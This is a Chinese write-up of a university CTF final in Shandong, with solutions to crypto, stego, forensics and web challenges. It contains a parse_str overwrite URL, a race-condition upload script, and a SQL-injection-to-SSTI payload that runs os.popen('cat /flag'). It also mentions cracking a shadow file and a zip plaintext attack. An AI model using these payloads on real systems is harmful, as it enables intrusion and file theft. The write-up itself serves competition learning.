第七屆山東省大學生網路安全技能大賽決賽writeup
先立個flag,以後每次比賽完都要復現寫WP…
Crypto-affine(6pts)
y = 17*x-8
flag{szzyfimhyzd}
仿射加密,指令碼
a = 'szzyfimhyzd'
a1=[]
for i in a:
a2 = ord(i)-97
a1.append(a2)
print a1
for i in a1:
for j in range(0,26):
c = (17*j-8)%26
if(c==i):
print chr(j+97),
flag{affineshift}
Misc-Crack it(8pts)
shadow檔案用john直接爆破
flag{hellokitty}
Misc-basic(10pts)
RGB畫圖,py指令碼
from PIL import Image
import re # 506*122=61366
x = 150 #x座標 通過對txt裡的行數進行整數分解
y = 900 #座標 x*y = 行數
im = Image.new("RGB",(x,y))#建立圖片
file = open('basic.txt') #開啟rbg值檔案
#通過一個個rgb點生成圖片
for i in range(0,x):
for 得到flag圖片
flag{RGB_1s_e4sY}
Misc-進位制轉換(14pts)
d87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x65 x20 b1111001 o157 b1110101 d32 o141 d32 d102 o154 x61 x67 b100000 o141 d115 b100000 b1100001 d32 x67 o151 x66 d116 b101110 b100000 d32 d102 d108 d97 o147 d123 x31 b1100101 b110100 d98 d102 b111000 d49 b1100001 d54 b110011 x39 o64 o144 o145 d53 x61 b1100010 b1100011 o60 d48 o65 b1100001 x63 b110110 d101 o63 b111001 d97 d51 o70 d55 b1100010 d125 x20 b101110 x20 b1001000 d97 d118 o145 x20 d97 o40 d103 d111 d111 x64 d32 o164 b1101001 x6d o145 x7e
有不同的進位制,直接指令碼轉換
flag{1e4bf81a6394de5abc005ac6e39a387b}
Stego-啊噠(8pts)
binwalk看到有zip
foremost分離得到加密zip
密碼再圖片詳情資訊裡
十六進位制轉字串得到解壓密碼
flag{[email protected]}
Stego-colors(21pts)
七張圖片再stegsolve檢視其他通道得到
MakeMeTall
修改圖片高度
把白色轉為0 黑色轉為1
得到七串二進位制
橫著解不出來 嘗試豎著解
指令碼
c1 = '11111111010111101111'
c2 = '11111011111110111111'
c3 = '00001100101010110001'
c4 = '01001010010000001101'
c5 = '11010011011101010111'
c6 = '10011011011010110110'
c7 = '00111001101101111101'
flag = ''
for i in range(0,20):
c = c1[i]+c2[i]+c3[i]+c4[i]+c5[i]+c6[i]+c7[i]
flag += chr(int(c,2))
print flag
flag{Png1n7erEs7iof}
Forensic-特殊後門(12pts)
搜尋flag字串,在icmp中得到提示flagishere,往下每一個包都有一個flag字元
flag{Icmp_backdoor_can_transfer-some_infomation}
Forensic-weblogic(12pts)
搜尋hostname
flag{6ad4c5a09043}
Forensic-日誌分析(12pts)
sql注入過程,上指令碼
flag{sqlm4p_15_p0werful}
Forensic-神祕的檔案(14pts)
zip明文攻擊,用winrar壓縮logo.png為zip檔案,然後用archpr明文攻擊
得到解壓密碼,解壓得到docx檔案,改字尾zip,得到flag.txt,base64得到
flag{d0cX_1s_ziP_file}
Web-babyWeb(15pts)
抓包加XFF頭,修改admin值為1
flag{4c39e6769fd4251d8b77d00546b76768}
Web-babyWeb2(35pts)
parse_str變數覆蓋
http://47.105.148.65:29002/?id=key[99]=QNKCDZO
得到隱藏介面
隨便寫個檔案,上傳得到檔案地址,訪問提示too slow!
想到條件競爭
條件競爭漏洞是一種伺服器端的漏洞,由於伺服器端在處理不同使用者的請求時是併發進行的,因此,如果併發處理不當或相關操作邏輯順序設計的不合理時,將會導致此類問題的發生。
具體可以看下這篇文章
重新隨便寫個檔案上傳,上傳時抓包
用burp的intruder開battering ram , payload null , generate 50
再利用指令碼getflag
import requests
url = 'http://47.105.148.65:29002/uploads/457b055ce2a489dd334216ed0564f9351506d690/coold.php'
while 1:
r = requests.get(url)
if 'flag' in r.text:
print r.text
開始intruder,py得到flag
flag{fa8d57d013fda75ad1e58e59b94b45c3}
Web-easy_flask(55pts)
在add介面測試
然後查詢
存在ssti
SSTI,又稱服務端模板注入攻擊。其發生在MVC框架中的view層。
服務端接收了使用者的輸入,將其作為 Web 應用模板內容的一部分,在進行目標編譯渲染的過程中,執行了使用者插入的惡意內容,因而可能導致了敏感資訊洩露、程式碼執行、GetShell 等問題
但是add中限制字元長度,最多提交十個字元,沒法正常使用ssti
測試search功能,username中存在sql注入
sdpcc ' union select 1,1,1 -- -
payload
sdpc' union select 1,2," {{''.__class__.__mro__[2].__subclasses__() [59].__init__.func_globals.linecache.os.popen('cat /flag').read()}}" -- -
當函式被禁用時,就要通過一些類中的關係來引用被禁用的函式
一些常見的尋找特殊模組的方式
class:獲得當前物件的類
bases:列出其基類
mro :列出解析方法的呼叫順序,類似於bases
subclasses():返回子類列表
dict : 列出當前屬性/函式的字典 func_globals返回一個包含函式全域性變數的字典引用
flag
flag{c15f43da-481e-4131-84b2-e315719b989b}
復現真的太重要了啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊
相關推薦
第七屆山東省大學生網路安全技能大賽決賽writeup
先立個flag,以後每次比賽完都要復現寫WP… Crypto-affine(6pts) y = 17*x-8 flag{szzyfimhyzd} 仿射加密,指令碼 a = 'szzyfimhyzd' a1=[] for i in a: a2 = o
科來杯”第七屆山東省大學生 網絡安全技能大賽
地址 二維 attack reserve 發現 zip 私鑰 網絡安全 三層 【Reserve】 【re-elf】 【babyLogin】 v10和v11差一個字節,在內存中。所以
2018“駭極杯”全國大學生網路安全邀請賽暨第四屆上海市大學生網路安全大賽線上賽 writeup
0x00 簽到題 操作內容: |登陸比賽介面 上去看到簽到題,一般情況下 簽到題是沒有難度的 題目給定一串字元MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32一閃而過
山東省網路安全技能大賽 部分writeup
web1 提示:ip不在範圍內 直接抓包加client-ip: 127.0.0.1 即可得到flag web2 <?php include 'here.php'; $key =&n
山東省第七屆ACM大學生程式設計競賽 總結
很惋惜的一場比賽,比賽前我想了很多個結局,可能是銀牌中等,銀牌末尾,要是運氣好的可能能混一個金牌回來。。但是銀首這個真的是超乎我意料之外。。。 開始比賽的不久我就看到了K題,一個作為簽到題的存在,開始習慣性的先敲輸入輸出。寫完輸入輸出之後感覺沒有比較好寫的思路
ZZUOJ-1195-OS Job Scheduling(鄭州大學第七屆ACM大學生程序設計競賽E題)
mis job sort iostream oda muc sans ios contains 1195: OS Job Scheduling Time Limit: 2 Sec Memory Limit: 128 MB Submit: 106 Solved:
(最短路)第七屆福建省大學生程序設計競賽 Problem J- X
main tails return ros code and rect list def Problem Description X is a fully prosperous country, especially known for its complicated
第七屆山東省省賽題解
color img bubuko nim 技術分享 The sort 什麽 也會 A - Julyed 類型: 水題 題意: Julyed正在為她的大學英語六級考試做準備。她有N個字要記,但只剩M天了。如果她記不住這些話,她就不會通過大學英語六級考試。如果她不能通過大學英語
第三屆全國大學生網路文化節網文作品徵集即將截止
由教育部思想政治工作司、中央網信辦網路社會工作局聯合舉辦的第三屆“全國大學生網路文化節”——網文作品徵集活動,為熱愛文字的你提供一個書寫的平臺,願你能在這裡盡情發揮自己的才能。寫赤誠,抒發對家國天下如火的熱情;寫美意,刻下那多情的眸子和如花的笑靨;寫誑語,揮灑任風輕狂、任海搖盪的不羈;寫古今,張揚出深刻與
山東省網路安全技能大賽準備
競賽內容 1、選擇題:題目涉及到網路安全的大部分領域,包含但不僅限於:網路基礎知識、網路安全管理體系、網路安全政策標準及法律法規、程式設計逆向、取證分析、漏洞挖掘、常見攻擊與防護方式、作業系統安全配置等。該部分題目數量100道,每題1分,總分為100分。 2、技能分析題:
第七屆山東省ACM省賽 A Julyed
Julyed Time Limit: 2000MS Memory Limit: 65536KB Problem Description Julyed is preparing for her CET-6. She has N words to remember
CTF--2016中國西安西電華山杯網路安全技能大賽之crackme6
Crackeme6 write up(help me) 0x01 為了照顧水平技術差異化,本題解答對大神來說,有些繁瑣。(大神可以忽略飄過) 方便一部分逆向新手學習。 0x02 命令列行程式上圖顯示崩潰,剛開始還懷疑程式編寫的有問題。 於是先暫時用IDA載入測試一
第八屆山東省ACM大學生程序設計競賽個人總結
我們 斐波那契 實現 結果 。。 學校 合數 工作 們的 因為省賽,從開學緊張到5月7號。心思也幾乎全放在ACM的訓練上。因為我還是校臺球協會的會長,所以臺協還有一些事情需要忙,但是我都給延遲了。老會長一直在催我辦校賽,但我一直說 等等吧,因為校賽只能在周六
[2012山東省第三屆ACM大學生程序設計競賽]——Mine Number
== memory cat chan get iostream sts 設計 target Mine Number 題目:http://acm.sdut.edu.cn/sdutoj/problem.php?action=showproblem&proble
第四屆上海大學生信息安全比賽----- web3
比較 alt 代碼 進行 比賽 http img -- 。。 這道是源碼題, 源碼: 源碼很簡單,我覺得考得主要是細心 直接看第一個if, 判斷是否上傳了一個文件,然後進去判斷是否POST了一個名為file的參數,如果有上傳這個參數,那麽$filename就等於這個POS
A__Writeup“百越杯”第四屆福建省高校網路空間安全大賽——致我的戰隊HeroCat的所有成員
作 者:HeroCat出 處:https://www.cnblogs.com/HeroCat/ 特此宣告:歡迎園子的大大們指正錯誤,共同進步。如有問題或建議,也請各位大佬多多賜教!如果您覺得文章對您有幫助,可以點選文章右下角【推薦】一下。版權宣告:本文版權歸作
2018~第三屆南寧市網路安全技術大賽~nnctf~write-up
Web 1.超簡單 分值:100 型別:WEB 已解決 題目:超簡單的web題 http://gxnnctf.gxsosec.cn:12311/ 程式碼審計 <?php $white_list = range(0,
“浪潮杯”山東省第八屆ACM大學生程式設計競賽I
Fascinated with the computer games, Gabriel even forgets to study. Now she needs to finish her homework, and there is an easy problem: f(n)= She is requir
第七屆ACM山東省賽-A Julyed
Time Limit: 2000MS Memory limit: 65536K 題目描述 Julyed is preparing for her CET-6. She has N words to remember, but there is only M
哈爾濱理工大學第七屆程式設計競賽決賽(網路賽-低年級組)
給出一個序列,你的任務是求序列中 (a[j]-a[i])/(j-i)【1<=i<j<=n】的最大值輸入描述:本題包含多組輸入,每組輸入第一行一個數字n,表示序列的長度。 然後接下來一行輸入n個數,表示原先序列的樣子。 資料範圍: 3<=n<=200000 -1000000000&